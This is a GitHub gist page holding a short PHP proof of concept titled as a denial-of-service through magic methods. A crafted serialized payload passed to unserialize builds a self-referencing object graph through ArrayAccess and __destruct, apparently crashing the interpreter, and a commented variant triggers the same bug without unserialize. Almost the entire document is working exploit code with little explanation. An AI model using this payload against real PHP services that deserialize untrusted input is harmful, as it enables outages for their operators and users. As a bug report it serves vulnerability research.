Skip to content

Instantly share code, notes, and snippets.

@dsadyrin
Created May 13, 2022 07:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dsadyrin/47a7b835cdfd6d44ba570c7b20fcb5e5 to your computer and use it in GitHub Desktop.
Save dsadyrin/47a7b835cdfd6d44ba570c7b20fcb5e5 to your computer and use it in GitHub Desktop.
PHP "Magic" methods DOS
<?php
class Obj implements ArrayAccess {
public function offsetExists($key) {
return true;
}
public function offsetSet($key, $value) { }
public function offsetGet($key) {
$this->data[123]; //any offset, need an object property
return 1;
}
public function offsetUnset($key) {
return;
}
}
class A {
function __destruct() {
$this->config['username'] ;
}
}
unserialize('O:1:"A":1:{s:6:"config";O:3:"Obj":1:{s:4:"data";R:2;}}');
/*
If you don't consider code with unserialize function call as security issue, use the code below to trigger the bug.
$o1 = new Obj;
$o1->data = &$o1;
$o2 = new A();
$o2->config = $o1;
*/
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment